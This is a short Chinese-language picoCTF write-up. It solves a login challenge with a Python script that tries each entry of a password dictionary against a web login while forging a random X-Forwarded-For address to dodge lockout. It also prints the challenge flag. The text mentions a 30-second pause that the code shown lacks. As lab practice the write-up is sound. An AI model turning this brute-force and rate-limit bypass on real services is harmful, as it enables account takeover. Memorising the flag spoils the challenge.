解題
下載題目的密碼字典
wget https://challenge-files.picoctf.net/c_amiable_citadel/ee2e840feeb2448808f2e1c94b22d339de8e4d87a5ee744a960c59b7a1552829/passwords.txt
查看題目給的密碼辭典格式
查看封包請求格式,值得注意的是他是用json發資料的
觀察前端網頁原始碼
使用python requests模組撰寫自動嘗試登入的程式,並在第9次後暫停30秒間隔時間(保險點可以設35秒),避免被鎖定
import time
import random
import requests
username="ctf-player@picoctf.org"
password=[]
with open("passwords.txt","r") as f:
for line in f.readlines():
password.append(line.strip())
url="http://amiable-citadel.picoctf.net:54800/login"
headers={
"Host": "amiable-citadel.picoctf.net:54800",
"Content-Length": "56",
"Accept-Language": "zh-TW,zh;q=0.9",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36",
"Content-Type": "application/json",
"Accept": "*/*",
"Origin": "http://amiable-citadel.picoctf.net:54800",
"Referer": "http://amiable-citadel.picoctf.net:54800/",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
for i in range(0,len(password)):
headers["X-Forwarded-For"] = f"{random.randint(1,255)}.{random.randint(0,255)}.{random.randint(0,255)}.{random.randint(0,255)}"
data={
"email":username,
"password":password[i],
}
r=requests.post(url,json=data,headers=headers)
resp = r.json()
if resp.get("success"):
print("Login successful!!")
print(resp.get("flag"))
break
print("Trying username: " + username + " password: " + password[i] + " error!!")
執行程式取得flag
picoCTF{xff_byp4ss_brut3_ff36dbbc}
提交flag
``
說些什麼吧!